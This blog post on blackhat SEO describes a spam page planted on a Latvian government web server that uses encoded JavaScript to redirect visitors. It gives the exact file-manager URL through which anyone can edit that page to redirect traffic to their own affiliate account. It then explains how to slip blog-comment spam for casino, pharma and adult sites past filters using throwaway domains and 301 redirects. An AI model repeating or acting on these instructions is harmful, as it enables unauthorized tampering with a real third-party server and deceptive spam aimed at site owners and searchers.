If you are like me, you probably track a couple pharm related request on Google to understand more about BlackHat Seo strategy that are really working . I’ve came across this article in french where the author, a french blackhat, explains a discovery he made looking at the results in Google for a viagra related query.

This webpage (http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/

plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm)

is on one of the webservers of the government of Latvia and definitly not putted there my government officials. If you were visiting this URL from Google, you were redirected to a pharm affiliate site. If you we’re visiting this URL directly, you we’re redirected to a porn site. The redirection is made using encoded javascript like usual. Once he decoded the javascript, we can see that the redirection is made using this URL. (You can see the code in the original article if you want to see it)

http://www.finance-leaders.com/feed2.php?keyword=”+ escape(”188″)+”&feed=8&ref=”+ escape(document.referrer))

The website http://sf.lm.gov.lv/ have a security problem that anyone can exploit right now.

The important point is that anyone can modify the javascript to redirect the traffic to the page they want. (No point of doing that now, first it’s illegal, and second, the page isn’t indexed in Google anymore.)

All you have to do is to go on

http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/

frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/CMS/modules/

EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/

buycheapviagraonlineukwr.htm&initial_path=mce_clear&initial_rootpath=

mce_clear&remember=true

and now going in the sub-directory /esf/in where the page buycheapviagraonlineukwr.htm is. You can edit it, delete it and replace it with whatever you want (so basicly changing the redirect to your own affiliate account). Google isn’t able to understand the encoded javascript but see the keywords filled page.

Something the original article don’t talk about is how the blackhat that made that page linkbuilded it.

What we can learn using yahoo is the number of links pointing to the page is very low and was linkbuilded using the usual blackhat pattern of spamming guestbooks and forums. But what is weirder, is that domain have been linkbuilded by the blackhats accoring to yahoo linkdomain. And looking at those URL, you can find plenty of vulnerable webservers that are used to spam the hell out the search engines.

And because the blackhat cannot protect is work (sure, he hack those webservers and cannot patch them), anyone can go and switch the affialite code. By the way, this page was 11th on one of the biggest keywords.

2008 is the year where Blackhat SEO met Hacking on a larger scale. This is just one of the proof.

I was thinking about blog comments spam for hard to cover niche (adult/casino/pharm) an others stuff like that where you can’t just put a URL like www.extracheappokerchips.com because you are gonna for sure being filtered by plug-ins like askimet or manually deleted by blogs admin. But there is a strategy you can use that could pass most of the filter.

First, you need a domain name that sound “legit” and that you don’t really care about. Once its registered you have 2 strategies you can use to bring some trafic / links to your domain in a harder to spam niche.

First strategy,  you simply 301 the new domain to your harder to spam domain. This way you get all the links and trafic directly to your domain and if the blog admin don’t take the time to click the link (and only see something like www.mypersonnalboringblog.com ) he will probably don’t filter it. So you will get the backlinks and traffic directly to your money domain, cool no ?

Second strategy is kinda the same than the first, but a little more evoluated. You just put up a real website/blog on the temporary domain than when you have the amount of links/traffic you want on it, you 301 it to your money domain. you can using this way add a couple social media frontpages and backlinks to the domains using word that you want backlinks on it without looking like a let’s say casino domains. So you make a  post about “chips” (as in “poker chips”), a post about russian roulette (as in roulette) etc… Than when you will 301 the domain to your casino website, all the links will sill be targeted

Don’t abuse those methods but they are very hard to track black hat seo strategy that can give awesome results.